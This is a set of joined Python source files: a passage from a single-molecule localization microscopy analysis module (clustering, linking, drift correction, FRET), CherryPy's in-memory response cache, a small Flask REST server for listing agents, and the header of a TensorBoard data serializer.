hasattr(locs, 'z'): print('z-coordinates detected') pixelsize = int(input("Enter the pixelsize in nm/px:")) locs = locs[_np.isfinite(locs.x) & _np.isfinite(locs.y) & _np.isfinite(locs.z)] X = _np.vstack((locs.x, locs.y, locs.z/pixelsize)).T db = _HDBSCAN(min_samples=min_samples, min_cluster_size=min_cluster_size).fit(X) group = _np.int32(db.labels_) # int32 for Origin compatiblity locs = _lib.append_to_rec(locs, group, 'group') locs = locs[locs.group != -1] print('Generating cluster information...') groups = _np.unique(locs.group) n_groups = len(groups) mean_frame = _np.zeros(n_groups) std_frame = _np.zeros(n_groups) com_x = _np.zeros(n_groups) com_y = _np.zeros(n_groups) com_z = _np.zeros(n_groups) std_x = _np.zeros(n_groups) std_y = _np.zeros(n_groups) std_z = _np.zeros(n_groups) convex_hull = _np.zeros(n_groups) volume = _np.zeros(n_groups) n = _np.zeros(n_groups, dtype=_np.int32) for i, group in enumerate(groups): group_locs = locs[locs.group == i] mean_frame[i] = _np.mean(group_locs.frame) com_x[i] = _np.mean(group_locs.x) com_y[i] = _np.mean(group_locs.y) com_z[i] = _np.mean(group_locs.z) std_frame[i] = _np.std(group_locs.frame) std_x[i] = _np.std(group_locs.x) std_y[i] = _np.std(group_locs.y) std_z[i] = _np.std(group_locs.z) n[i] = len(group_locs) X_group = _np.stack([group_locs.x,group_locs.y,group_locs.z/pixelsize], axis=0).T volume[i] = _np.power((std_x[i]+std_y[i]+(std_z[i]/pixelsize))/3*2,3)*_np.pi*4/3 try: hull = ConvexHull(X_group) convex_hull[i] = hull.volume except: convex_hull[i] = 0 clusters = _np.rec.array((groups, convex_hull, volume, mean_frame, com_x, com_y, com_z, std_frame, std_x, std_y, std_z, n), dtype=[('groups', groups.dtype),('convex_hull', 'f4'),('volume', 'f4'), ('mean_frame', 'f4'), ('com_x', 'f4'), ('com_y', 'f4'),('com_z', 'f4'), ('std_frame', 'f4'), ('std_x', 'f4'), ('std_y', 'f4'),('std_z', 'f4'),('n', 'i4')]) else: locs = locs[_np.isfinite(locs.x) & _np.isfinite(locs.y)] X = _np.vstack((locs.x, locs.y)).T db = _HDBSCAN(min_samples=min_samples, min_cluster_size=min_cluster_size).fit(X) group = _np.int32(db.labels_) # int32 for Origin compatiblity locs = _lib.append_to_rec(locs, group, 'group') locs = locs[locs.group != -1] print('Generating cluster information...') groups = _np.unique(locs.group) n_groups = len(groups) mean_frame = _np.zeros(n_groups) std_frame = _np.zeros(n_groups) com_x = _np.zeros(n_groups) com_y = _np.zeros(n_groups) std_x = _np.zeros(n_groups) std_y = _np.zeros(n_groups) convex_hull = _np.zeros(n_groups) area = _np.zeros(n_groups) n = _np.zeros(n_groups, dtype=_np.int32) for i, group in enumerate(groups): group_locs = locs[locs.group == i] mean_frame[i] = _np.mean(group_locs.frame) com_x[i] = _np.mean(group_locs.x) com_y[i] = _np.mean(group_locs.y) std_frame[i] = _np.std(group_locs.frame) std_x[i] = _np.std(group_locs.x) std_y[i] = _np.std(group_locs.y) n[i] = len(group_locs) X_group = _np.stack([group_locs.x,group_locs.y], axis=0).T area[i] = _np.power((std_x[i]+std_y[i]),2)*_np.pi try: hull = ConvexHull(X_group) convex_hull[i] = hull.volume except: convex_hull[i] = 0 clusters = _np.rec.array((groups, convex_hull, area, mean_frame, com_x, com_y, std_frame, std_x, std_y, n), dtype=[('groups', groups.dtype),('convex_hull', 'f4'),('area', 'f4'), ('mean_frame', 'f4'), ('com_x', 'f4'), ('com_y', 'f4'), ('std_frame', 'f4'), ('std_x', 'f4'), ('std_y', 'f4'), ('n', 'i4')]) return clusters, locs @_numba.jit(nopython=True, nogil=True) def _local_density(locs, radius, x_index, y_index, block_starts, block_ends, start, chunk): x = locs.x y = locs.y N = len(x) r2 = radius**2 end = min(start+chunk, N) density = _np.zeros(N, dtype=_np.uint32) for i in range(start, end): yi = y[i] xi = x[i] ki = y_index[i] li = x_index[i] di = 0 for k in range(ki-1, ki+2): for l in range(li-1, li+2): j_min = block_starts[k, l] j_max = block_ends[k, l] for j in range(j_min, j_max): dx2 = (xi - x[j])**2 if dx2 < r2: dy2 = (yi - y[j])**2 if dy2 < r2: d2 = dx2 + dy2 if d2 < r2: di += 1 density[i] = di return density def compute_local_density(locs, info, radius): locs, x_index, y_index, block_starts, block_ends = get_index_blocks(locs, info, radius) N = len(locs) n_threads = _multiprocessing.cpu_count() chunk = int(N / n_threads) starts = range(0, N, chunk) args = [(locs, radius, x_index, y_index, block_starts, block_ends, start, chunk) for start in starts] with _ThreadPoolExecutor() as executor: futures = [executor.submit(_local_density, *_) for _ in args] density = _np.sum([future.result() for future in futures], axis=0) locs = _lib.remove_from_rec(locs, 'density') return _lib.append_to_rec(locs, density, 'density') def compute_dark_times(locs, group=None): dark = dark_times(locs, group) locs = _lib.append_to_rec(locs, _np.int32(dark), 'dark') locs = locs[locs.dark != -1] return locs def dark_times(locs, group=None): last_frame = locs.frame + locs.len - 1 if group is None: if hasattr(locs, 'group'): group = locs.group else: group = _np.zeros(len(locs)) dark = _dark_times(locs, group, last_frame) return dark @_numba.jit(nopython=True) def _dark_times(locs, group, last_frame): N = len(locs) max_frame = locs.frame.max() dark = max_frame * _np.ones(len(locs), dtype=_np.int32) for i in range(N): for j in range(N): if (group[i] == group[j]) and (i != j): dark_ij = locs.frame[i] - last_frame[j] if (dark_ij > 0) and (dark_ij < dark[i]): dark[i] = dark_ij for i in range(N): if dark[i] == max_frame: dark[i] = -1 return dark def link(locs, info, r_max=0.05, max_dark_time=1, combine_mode='average', remove_ambiguous_lengths=True): if len(locs) == 0: linked_locs = locs.copy() if hasattr(locs, 'frame'): linked_locs = _lib.append_to_rec(linked_locs, _np.array([], dtype=_np.int32), 'len') linked_locs = _lib.append_to_rec(linked_locs, _np.array([], dtype=_np.int32), 'n') if hasattr(locs, 'photons'): linked_locs = _lib.append_to_rec(linked_locs, _np.array([], dtype=_np.float32), 'photon_rate') else: locs.sort(kind='mergesort', order='frame') if hasattr(locs, 'group'): group = locs.group else: group = _np.zeros(len(locs), dtype=_np.int32) link_group = get_link_groups(locs, r_max, max_dark_time, group) if combine_mode == 'average': linked_locs = link_loc_groups(locs, info, link_group, remove_ambiguous_lengths=remove_ambiguous_lengths) elif combine_mode == 'refit': pass # TODO return linked_locs def weighted_variance(locs): n = len(locs) w = locs.photons x = locs.x y = locs.y xWbarx = _np.average(locs.x,weights = w) xWbary = _np.average(locs.y,weights = w) wbarx = _np.mean(locs.lpx) wbary = _np.mean(locs.lpy) variance_x = n/((n-1)*sum(w)**2)*(sum((w*x-wbarx*xWbarx)**2)-2*xWbarx*sum((w-wbarx)*(w*x-wbarx*xWbarx))+xWbarx**2*sum((w-wbarx)**2)) variance_y = n/((n-1)*sum(w)**2)*(sum((w*y-wbary*xWbary)**2)-2*xWbary*sum((w-wbary)*(w*y-wbary*xWbary))+xWbary**2*sum((w-wbary)**2)) return variance_x, variance_y #Combine localizations: calculate the properties of the group def cluster_combine(locs): print('Combining localizations...') combined_locs = [] if hasattr(locs[0], 'z'): print('z-mode') for group in _tqdm(_np.unique(locs['group'])): temp = locs[locs['group']==group] cluster = _np.unique(temp['cluster']) n_cluster = len(cluster) mean_frame = _np.zeros(n_cluster) std_frame = _np.zeros(n_cluster) com_x = _np.zeros(n_cluster) com_y = _np.zeros(n_cluster) com_z = _np.zeros(n_cluster) std_x = _np.zeros(n_cluster) std_y = _np.zeros(n_cluster) std_z = _np.zeros(n_cluster) group_id = _np.zeros(n_cluster) n = _np.zeros(n_cluster, dtype=_np.int32) for i, clusterval in enumerate(cluster): cluster_locs = temp[temp['cluster']== clusterval] mean_frame[i] = _np.mean(cluster_locs.frame) com_x[i] = _np.average(cluster_locs.x,weights = cluster_locs.photons) com_y[i] = _np.average(cluster_locs.y,weights = cluster_locs.photons) com_z[i] = _np.average(cluster_locs.z,weights = cluster_locs.photons) std_frame[i] = _np.std(cluster_locs.frame) #variance_x, variance_y = weighted_variance(cluster_locs) std_x[i] = _np.std(cluster_locs.x)/_np.sqrt(len(cluster_locs)) std_y[i] = _np.std(cluster_locs.y)/_np.sqrt(len(cluster_locs)) std_z[i] = _np.std(cluster_locs.z)/_np.sqrt(len(cluster_locs)) n[i] = len(cluster_locs) group_id[i] = group clusters = _np.rec.array((group_id, cluster, mean_frame, com_x, com_y, com_z, std_frame, std_x, std_y, std_z, n), dtype=[('group', group.dtype),('cluster', cluster.dtype), ('mean_frame', 'f4'), ('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('std_frame', 'f4'), ('lpx', 'f4'), ('lpy', 'f4'), ('lpz', 'f4'), ('n', 'i4')]) combined_locs.append(clusters) else: for group in _tqdm(_np.unique(locs['group'])): temp = locs[locs['group']==group] cluster = _np.unique(temp['cluster']) n_cluster = len(cluster) mean_frame = _np.zeros(n_cluster) std_frame = _np.zeros(n_cluster) com_x = _np.zeros(n_cluster) com_y = _np.zeros(n_cluster) std_x = _np.zeros(n_cluster) std_y = _np.zeros(n_cluster) group_id = _np.zeros(n_cluster) n = _np.zeros(n_cluster, dtype=_np.int32) for i, clusterval in enumerate(cluster): cluster_locs = temp[temp['cluster']== clusterval] mean_frame[i] = _np.mean(cluster_locs.frame) com_x[i] = _np.average(cluster_locs.x,weights = cluster_locs.photons) com_y[i] = _np.average(cluster_locs.y,weights = cluster_locs.photons) std_frame[i] = _np.std(cluster_locs.frame) #variance_x, variance_y = weighted_variance(cluster_locs) std_x[i] = _np.std(cluster_locs.x)/_np.sqrt(len(cluster_locs)) std_y[i] = _np.std(cluster_locs.y)/_np.sqrt(len(cluster_locs)) n[i] = len(cluster_locs) group_id[i] = group clusters = _np.rec.array((group_id, cluster, mean_frame, com_x, com_y, std_frame, std_x, std_y, n), dtype=[('group', group.dtype),('cluster', cluster.dtype), ('mean_frame', 'f4'), ('x', 'f4'), ('y', 'f4'), ('std_frame', 'f4'), ('lpx', 'f4'), ('lpy', 'f4'), ('n', 'i4')]) combined_locs.append(clusters) combined_locs = stack_arrays(combined_locs, asrecarray=True, usemask=False) return combined_locs def cluster_combine_dist(locs): print('Calculating distances...') if hasattr(locs, 'z'): print('XYZ') pixelsize = int(input("Enter the pixelsize in nm/px:")) combined_locs = [] for group in _tqdm(_np.unique(locs['group'])): temp = locs[locs['group']==group] cluster = _np.unique(temp['cluster']) n_cluster = len(cluster) mean_frame = temp['mean_frame'] std_frame = temp['std_frame'] com_x = temp['x'] com_y = temp['y'] com_z = temp['z'] std_x = temp['lpx'] std_y = temp['lpy'] std_z = temp['lpz'] group_id = temp['group'] n = temp['n'] min_dist = _np.zeros(n_cluster) min_distz = _np.zeros(n_cluster) for i, clusterval in enumerate(cluster): #find nearest neighbor in xyz group_locs = temp[temp['cluster']!= clusterval] cluster_locs = temp[temp['cluster']== clusterval] ref_point = _np.array([cluster_locs.x, cluster_locs.y, cluster_locs.z/pixelsize]) all_points = _np.array([group_locs.x, group_locs.y, group_locs.z/pixelsize]) distances = distance.cdist(ref_point.transpose(), all_points.transpose()) min_dist[i] = _np.amin(distances) #find nearest neighbor in xy ref_point_xy = _np.array([cluster_locs.x, cluster_locs.y]) all_points_xy = _np.array([group_locs.x, group_locs.y]) distances_xy = distance.cdist(ref_point_xy.transpose(), all_points_xy.transpose()) min_dist_xy[i] = _np.amin(distances_xy) clusters = _np.rec.array((group_id, cluster, mean_frame, com_x, com_y, com_z, std_frame, std_x, std_y, std_z, n, min_dist, min_dist_xy), dtype=[('group', group.dtype),('cluster', cluster.dtype), ('mean_frame', 'f4'), ('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('std_frame', 'f4'), ('lpx', 'f4'), ('lpy', 'f4'), ('lpz', 'f4'), ('n', 'i4'), ('min_dist', 'f4'), ('mind_dist_xy', 'f4')]) combined_locs.append(clusters) else: #2D Case print('XY') combined_locs = [] for group in _tqdm(_np.unique(locs['group'])): temp = locs[locs['group']==group] cluster = _np.unique(temp['cluster']) n_cluster = len(cluster) mean_frame = temp['mean_frame'] std_frame = temp['std_frame'] com_x = temp['x'] com_y = temp['y'] std_x = temp['lpx'] std_y = temp['lpy'] group_id = temp['group'] n = temp['n'] min_dist = _np.zeros(n_cluster) for i, clusterval in enumerate(cluster): #find nearest neighbor in xyz group_locs = temp[temp['cluster']!= clusterval] cluster_locs = temp[temp['cluster']== clusterval] ref_point_xy = _np.array([cluster_locs.x, cluster_locs.y]) all_points_xy = _np.array([group_locs.x, group_locs.y]) distances_xy = distance.cdist(ref_point_xy.transpose(), all_points_xy.transpose()) min_dist[i] = _np.amin(distances_xy) clusters = _np.rec.array((group_id, cluster, mean_frame, com_x, com_y, std_frame, std_x, std_y, n, min_dist), dtype=[('group', group.dtype),('cluster', cluster.dtype), ('mean_frame', 'f4'), ('x', 'f4'), ('y', 'f4'), ('std_frame', 'f4'), ('lpx', 'f4'), ('lpy', 'f4'), ('n', 'i4'), ('min_dist', 'f4')]) combined_locs.append(clusters) combined_locs = stack_arrays(combined_locs, asrecarray=True, usemask=False) return combined_locs @_numba.jit(nopython=True) def get_link_groups(locs, d_max, max_dark_time, group): ''' Assumes that locs are sorted by frame ''' frame = locs.frame x = locs.x y = locs.y N = len(x) link_group = -_np.ones(N, dtype=_np.int32) current_link_group = -1 for i in range(N): if link_group[i] == -1: # loc has no group yet current_link_group += 1 link_group[i] = current_link_group current_index = i next_loc_index_in_group = _get_next_loc_index_in_link_group(current_index, link_group, N, frame, x, y, d_max, max_dark_time, group) while next_loc_index_in_group != -1: link_group[next_loc_index_in_group] = current_link_group current_index = next_loc_index_in_group next_loc_index_in_group = _get_next_loc_index_in_link_group(current_index, link_group, N, frame, x, y, d_max, max_dark_time, group) return link_group @_numba.jit(nopython=True) def _get_next_loc_index_in_link_group(current_index, link_group, N, frame, x, y, d_max, max_dark_time, group): current_frame = frame[current_index] current_x = x[current_index] current_y = y[current_index] current_group = group[current_index] min_frame = current_frame + 1 for min_index in range(current_index + 1, N): if frame[min_index] >= min_frame: break max_frame = current_frame + max_dark_time + 1 for max_index in range(min_index, N): if frame[max_index] > max_frame: break else: max_index = N d_max_2 = d_max**2 for j in range(min_index, max_index): if group[j] == current_group: if link_group[j] == -1: dx2 = (current_x - x[j])**2 if dx2 <= d_max_2: dy2 = (current_y - y[j])**2 if dy2 <= d_max_2: if _np.sqrt(dx2 + dy2) <= d_max: return j return -1 @_numba.jit(nopython=True) def _link_group_count(link_group, n_locs, n_groups): result = _np.zeros(n_groups, dtype=_np.uint32) for i in range(n_locs): i_ = link_group[i] result[i_] += 1 return result @_numba.jit(nopython=True) def _link_group_sum(column, link_group, n_locs, n_groups): result = _np.zeros(n_groups, dtype=column.dtype) for i in range(n_locs): i_ = link_group[i] result[i_] += column[i] return result @_numba.jit(nopython=True) def _link_group_mean(column, link_group, n_locs, n_groups, n_locs_per_group): group_sum = _link_group_sum(column, link_group, n_locs, n_groups) result = _np.empty(n_groups, dtype=_np.float32) # this ensures float32 after the division result[:] = group_sum / n_locs_per_group return result @_numba.jit(nopython=True) def _link_group_weighted_mean(column, weights, link_group, n_locs, n_groups, n_locs_per_group): sum_weights = _link_group_sum(weights, link_group, n_locs, n_groups) return _link_group_mean(column * weights, link_group, n_locs, n_groups, sum_weights), sum_weights @_numba.jit(nopython=True) def _link_group_min_max(column, link_group, n_locs, n_groups): min_ = _np.empty(n_groups, dtype=column.dtype) max_ = _np.empty(n_groups, dtype=column.dtype) min_[:] = column.max() max_[:] = column.min() for i in range(n_locs): i_ = link_group[i] value = column[i] if value < min_[i_]: min_[i_] = value if value > max_[i_]: max_[i_] = value return min_, max_ @_numba.jit(nopython=True) def _link_group_last(column, link_group, n_locs, n_groups): result = _np.zeros(n_groups, dtype=column.dtype) for i in range(n_locs): i_ = link_group[i] result[i_] = column[i] return result def link_loc_groups(locs, info, link_group, remove_ambiguous_lengths=True): n_locs = len(link_group) n_groups = link_group.max() + 1 n_ = _link_group_count(link_group, n_locs, n_groups) columns = _OrderedDict() if hasattr(locs, 'frame'): first_frame_, last_frame_ = _link_group_min_max(locs.frame, link_group, n_locs, n_groups) columns['frame'] = first_frame_ if hasattr(locs, 'x'): weights_x = 1 / locs.lpx**2 columns['x'], sum_weights_x_ = _link_group_weighted_mean(locs.x, weights_x, link_group, n_locs, n_groups, n_) if hasattr(locs, 'y'): weights_y = 1 / locs.lpy**2 columns['y'], sum_weights_y_ = _link_group_weighted_mean(locs.y, weights_y, link_group, n_locs, n_groups, n_) if hasattr(locs, 'photons'): columns['photons'] = _link_group_sum(locs.photons, link_group, n_locs, n_groups) if hasattr(locs, 'sx'): columns['sx'] = _link_group_mean(locs.sx, link_group, n_locs, n_groups, n_) if hasattr(locs, 'sy'): columns['sy'] = _link_group_mean(locs.sy, link_group, n_locs, n_groups, n_) if hasattr(locs, 'bg'): columns['bg'] = _link_group_sum(locs.bg, link_group, n_locs, n_groups) if hasattr(locs, 'x'): columns['lpx'] = _np.sqrt(1 / sum_weights_x_) if hasattr(locs, 'y'): columns['lpy'] = _np.sqrt(1 / sum_weights_y_) if hasattr(locs, 'ellipticity'): columns['ellipticity'] = _link_group_mean(locs.ellipticity, link_group, n_locs, n_groups, n_) if hasattr(locs, 'net_gradient'): columns['net_gradient'] = _link_group_mean(locs.net_gradient, link_group, n_locs, n_groups, n_) if hasattr(locs, 'likelihood'): columns['likelihood'] = _link_group_mean(locs.likelihood, link_group, n_locs, n_groups, n_) if hasattr(locs, 'iterations'): columns['iterations'] = _link_group_mean(locs.iterations, link_group, n_locs, n_groups, n_) if hasattr(locs, 'z'): columns['z'] = _link_group_mean(locs.z, link_group, n_locs, n_groups, n_) if hasattr(locs, 'd_zcalib'): columns['d_zcalib'] = _link_group_mean(locs.d_zcalib, link_group, n_locs, n_groups, n_) if hasattr(locs, 'group'): columns['group'] = _link_group_last(locs.group, link_group, n_locs, n_groups) if hasattr(locs, 'frame'): columns['len'] = last_frame_ - first_frame_ + 1 columns['n'] = n_ if hasattr(locs, 'photons'): columns['photon_rate'] = _np.float32(columns['photons'] / n_) linked_locs = _np.rec.array(list(columns.values()), names=list(columns.keys())) if remove_ambiguous_lengths: valid = _np.logical_and(first_frame_ > 0, last_frame_ < info[0]['Frames']) linked_locs = linked_locs[valid] return linked_locs def localization_precision(photons, s, bg, em): ''' Calculates the theoretical localization preicision according to Mortensen et al., Nat Meth, 2010 ''' s2 = s**2 sa2 = s2 + 1/12 v = sa2 * (16/9 + (8 * _np.pi * sa2 * bg) / photons) / photons if em: v *= 2 with _np.errstate(invalid='ignore'): return _np.sqrt(v) def undrift(locs, info, segmentation, display=True, segmentation_callback=None, rcc_callback=None): bounds, segments = _render.segment(locs, info, segmentation, {'blur_method': 'gaussian', 'min_blur_width': 1}, segmentation_callback) shift_y, shift_x = _imageprocess.rcc(segments, 32, rcc_callback) t = (bounds[1:] + bounds[:-1]) / 2 drift_x_pol = _interpolate.InterpolatedUnivariateSpline(t, shift_x, k=3) drift_y_pol = _interpolate.InterpolatedUnivariateSpline(t, shift_y, k=3) t_inter = _np.arange(info[0]['Frames']) drift = (drift_x_pol(t_inter), drift_y_pol(t_inter)) drift = _np.rec.array(drift, dtype=[('x', 'f'), ('y', 'f')]) if display: fig1 = _plt.figure(figsize=(17, 6)) _plt.suptitle('Estimated drift') _plt.subplot(1, 2, 1) _plt.plot(drift.x, label='x interpolated') _plt.plot(drift.y, label='y interpolated') t = (bounds[1:] + bounds[:-1]) / 2 _plt.plot(t, shift_x, 'o', color=list(_plt.rcParams['axes.prop_cycle'])[0]['color'], label='x') _plt.plot(t, shift_y, 'o', color=list(_plt.rcParams['axes.prop_cycle'])[1]['color'], label='y') _plt.legend(loc='best') _plt.xlabel('Frame') _plt.ylabel('Drift (pixel)') _plt.subplot(1, 2, 2) _plt.plot(drift.x, drift.y, color=list(_plt.rcParams['axes.prop_cycle'])[2]['color']) _plt.plot(shift_x, shift_y, 'o', color=list(_plt.rcParams['axes.prop_cycle'])[2]['color']) _plt.axis('equal') _plt.xlabel('x') _plt.ylabel('y') fig1.show() locs.x -= drift.x[locs.frame] locs.y -= drift.y[locs.frame] return drift, locs def align(locs, infos, display=False): images = [] for i, (locs_, info_) in enumerate(zip(locs, infos)): _, image = _render.render(locs_, info_, blur_method='smooth') images.append(image) shift_y, shift_x = _imageprocess.rcc(images) print('Image x shifts: {}'.format(shift_x)) print('Image y shifts: {}'.format(shift_y)) for i, (locs_, dx, dy) in enumerate(zip(locs, shift_x, shift_y)): locs_.y -= dy locs_.x -= dx return locs def groupprops(locs, callback=None): try: locs = locs[locs.dark != -1] except AttributeError: pass group_ids = _np.unique(locs.group) n = len(group_ids) n_cols = len(locs.dtype) names = ['group', 'n_events'] + list(_itertools.chain(*[(_ + '_mean', _ + '_std') for _ in locs.dtype.names])) formats = ['i4', 'i4'] + 2 * n_cols * ['f4'] groups = _np.recarray(n, formats=formats, names=names) if callback is not None: callback(0) for i, group_id in enumerate(_tqdm(group_ids, desc='Calculating group statistics', unit='Groups')): group_locs = locs[locs.group == group_id] groups['group'][i] = group_id groups['n_events'][i] = len(group_locs) for name in locs.dtype.names: groups[name + '_mean'][i] = _np.mean(group_locs[name]) groups[name + '_std'][i] = _np.std(group_locs[name]) if callback is not None: callback(i+1) return groups #FRET functions def calculate_fret(acc_locs, don_locs): """ Calculate the FRET efficiceny in picked regions, this is for one trace """ fret_dict = {} if len(acc_locs) == 0: max_frames = _np.max(don_locs['frame']) elif len(don_locs) == 0: max_frames = _np.max(acc_locs['frame']) else: max_frames = _np.max([_np.max(acc_locs['frame']),_np.max(don_locs['frame'])]) #Initialize a vector filled with zeros for the duration of the movie xvec = _np.arange(max_frames+1) yvec = xvec[:]*0 acc_trace = yvec.copy() don_trace = yvec.copy() #Fill vector with the photon numbers of events that happend acc_trace[acc_locs['frame']]=acc_locs['photons']-acc_locs['bg'] don_trace[don_locs['frame']]=don_locs['photons']-don_locs['bg'] #Calculate the FRET efficiency fret_trace = acc_trace/(acc_trace+don_trace) #Only select FRET values between 0 and 1 selector = _np.logical_and(fret_trace>0,fret_trace<1) #select the final fret events based on the 0 to 1 range fret_events = fret_trace[selector] fret_timepoints = _np.arange(len(fret_trace))[selector] # Calculate FRET localizations: Select the localizations when FRET happens #loc_selector = [True if _ in fret_timepoints else False for _ in don_locs['frame'] ] #fret_locs = don_locs[loc_selector==True] sel_locs = [] for element in fret_timepoints: sel_locs.append(don_locs[don_locs['frame']==element]) fret_locs = stack_arrays(sel_locs, asrecarray=True, usemask=False) fret_locs = _lib.append_to_rec(fret_locs, _np.array(fret_events), 'fret') fret_dict['fret_events'] = _np.array(fret_events) fret_dict['fret_timepoints'] = fret_timepoints fret_dict['acc_trace'] = acc_trace fret_dict['don_trace'] = don_trace fret_dict['frames'] = xvec fret_dict['maxframes'] = max_frames return fret_dict, fret_locs
caching.py
import datetime import threading import time import cherrypy from cherrypy.lib import cptools, http class MemoryCache: maxobjects = 1000 maxobj_size = 100000 maxsize = 10000000 delay = 600 def __init__(self): self.clear() t = threading.Thread(target=self.expire_cache, name='expire_cache') self.expiration_thread = t if hasattr(threading.Thread, "daemon"): # Python 2.6+ t.daemon = True else: t.setDaemon(True) t.start() def clear(self): """Reset the cache to its initial, empty state.""" self.cache = {} self.expirations = {} self.tot_puts = 0 self.tot_gets = 0 self.tot_hist = 0 self.tot_expires = 0 self.tot_non_modified = 0 self.cursize = 0 def key(self): return cherrypy.url(qs=cherrypy.request.query_string) def expire_cache(self): # expire_cache runs in a separate thread which the servers are # not aware of. It's possible that "time" will be set to None # arbitrarily, so we check "while time" to avoid exceptions. # See tickets #99 and #180 for more information. while time: now = time.time() for expiration_time, objects in self.expirations.items(): if expiration_time <= now: for obj_size, obj_key in objects: try: del self.cache[obj_key] self.tot_expires += 1 self.cursize -= obj_size except KeyError: # the key may have been deleted elsewhere pass del self.expirations[expiration_time] time.sleep(0.1) def get(self): """Return the object if in the cache, else None.""" self.tot_gets += 1 cache_item = self.cache.get(self.key(), None) if cache_item: self.tot_hist += 1 return cache_item else: return None def put(self, obj): if len(self.cache) < self.maxobjects: # Size check no longer includes header length obj_size = len(obj[2]) total_size = self.cursize + obj_size # checks if there's space for the object if (obj_size < self.maxobj_size and total_size < self.maxsize): # add to the expirations list and cache expiration_time = cherrypy.response.time + self.delay obj_key = self.key() bucket = self.expirations.setdefault(expiration_time, []) bucket.append((obj_size, obj_key)) self.cache[obj_key] = obj self.tot_puts += 1 self.cursize = total_size def delete(self): self.cache.pop(self.key(), None) def get(invalid_methods=("POST", "PUT", "DELETE"), **kwargs): """Try to obtain cached output. If fresh enough, raise HTTPError(304). If POST, PUT, or DELETE: * invalidates (deletes) any cached response for this resource * sets request.cached = False * sets request.cacheable = False else if a cached copy exists: * sets request.cached = True * sets request.cacheable = False * sets response.headers to the cached values * checks the cached Last-Modified response header against the current If-(Un)Modified-Since request headers; raises 304 if necessary. * sets response.status and response.body to the cached values * returns True otherwise: * sets request.cached = False * sets request.cacheable = True * returns False """ request = cherrypy.request # POST, PUT, DELETE should invalidate (delete) the cached copy. # See http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.10. if request.method in invalid_methods: cherrypy._cache.delete() request.cached = False request.cacheable = False return False cache_data = cherrypy._cache.get() request.cached = c = bool(cache_data) request.cacheable = not c if c: response = cherrypy.response s, h, b, create_time, original_req_headers = cache_data # Check 'Vary' selecting headers. If any headers mentioned in "Vary" # differ between the cached and current request, bail out and # let the rest of CP handle the request. This should properly # mimic the behavior of isolated caches as RFC 2616 assumes: # "If the selecting request header fields for the cached entry # do not match the selecting request header fields of the new # request, then the cache MUST NOT use a cached entry to satisfy # the request unless it first relays the new request to the origin # server in a conditional request and the server responds with # 304 (Not Modified), including an entity tag or Content-Location # that indicates the entity to be used. # TODO: can we store multiple variants based on Vary'd headers? for header_element in h.elements('Vary'): key = header_element.value if original_req_headers[key] != request.headers.get(key, 'missing'): request.cached = False request.cacheable = True return False # Copy the response headers. See http://www.cherrypy.org/ticket/721. response.headers = rh = http.HeaderMap() for k in h: dict.__setitem__(rh, k, dict.__getitem__(h, k)) # Add the required Age header response.headers["Age"] = str(int(response.time - create_time)) try: # Note that validate_since depends on a Last-Modified header; # this was put into the cached copy, and should have been # resurrected just above (response.headers = cache_data[1]). cptools.validate_since() except cherrypy.HTTPRedirect, x: if x.status == 304: cherrypy._cache.tot_non_modified += 1 raise # serve it & get out from the request response.status = s response.body = b return c def tee_output(): def tee(body): """Tee response.body into a list.""" output = [] for chunk in body: output.append(chunk) yield chunk # Might as well do this here; why cache if the body isn't consumed? if response.headers.get('Pragma', None) != 'no-cache': # save the cache data body = ''.join(output) vary = [he.value for he in cherrypy.response.headers.elements('Vary')] if vary: sel_headers = dict([(k, v) for k, v in cherrypy.request.headers.iteritems() if k in vary]) else: sel_headers = {} cherrypy._cache.put((response.status, response.headers or {}, body, response.time, sel_headers)) response = cherrypy.response response.body = tee(response.body) def expires(secs=0, force=False): """Tool for influencing cache mechanisms using the 'Expires' header. 'secs' must be either an int or a datetime.timedelta, and indicates the number of seconds between response.time and when the response should expire. The 'Expires' header will be set to (response.time + secs). If 'secs' is zero, the 'Expires' header is set one year in the past, and the following "cache prevention" headers are also set: 'Pragma': 'no-cache' 'Cache-Control': 'no-cache, must-revalidate' If 'force' is False (the default), the following headers are checked: 'Etag', 'Last-Modified', 'Age', 'Expires'. If any are already present, none of the above response headers are set. """ response = cherrypy.response headers = response.headers cacheable = False if not force: # some header names that indicate that the response can be cached for indicator in ('Etag', 'Last-Modified', 'Age', 'Expires'): if indicator in headers: cacheable = True break if not cacheable: if isinstance(secs, datetime.timedelta): secs = (86400 * secs.days) + secs.seconds if secs == 0: if force or "Pragma" not in headers: headers["Pragma"] = "no-cache" if cherrypy.request.protocol >= (1, 1): if force or "Cache-Control" not in headers: headers["Cache-Control"] = "no-cache, must-revalidate" # Set an explicit Expires date in the past. expiry = http.HTTPDate(1169942400.0) else: expiry = http.HTTPDate(response.time + secs) if force or "Expires" not in headers: headers["Expires"] = expiry
rest.py
import json import threading import logging from flask import Flask, make_response, request import requests from .modulemanager import ModuleManager app = Flask(__name__, static_url_path='', static_folder='./site') def agent_to_json(agent) -> dict: return {"name": agent.identifier, "type": agent.agent_type, "alive": agent.is_alive(), "threadId": agent.ident} """ One page app handler, always returns index.html For some strange reason @app.route("/<path:_>") didn't work, this should be investigated but for now the below works """ @app.route("/") @app.route("/<_>") @app.route("/<_>/<__>") @app.route("/<_>/<__>/<___>") def index(**_): return app.send_static_file("index.html") @app.route("/api/0/agents") def get_agents(): agents = [] for agent in ModuleManager().agents: agents.append(agent_to_json(agent)) return json.dumps(agents) @app.route("/api/0/agents/<int:agent_id>") def get_agent(agent_id): for agent in ModuleManager().agents: if agent._ident == agent_id: return json.dumps(agent_to_json(agent)) return make_response("Resource not found", 400) @app.route("/scripts/<file>") def scripts(file): return app.send_static_file("scripts/" + file) @app.route("/templates/<file>") def templates(file): return app.send_static_file("templates/" + file) def start_server(): thread = threading.Thread(target=app.run, daemon=True) thread.start()
serialize_tensorboard.py
# Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Consume and serialize all of the data from a running TensorBoard instance. This program connects to a live TensorBoard backend at given port, and saves all of the data to local disk JSON in a predictable format. This makes it easy to mock out the TensorBoard backend so that the frontend may be tested in isolation. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function 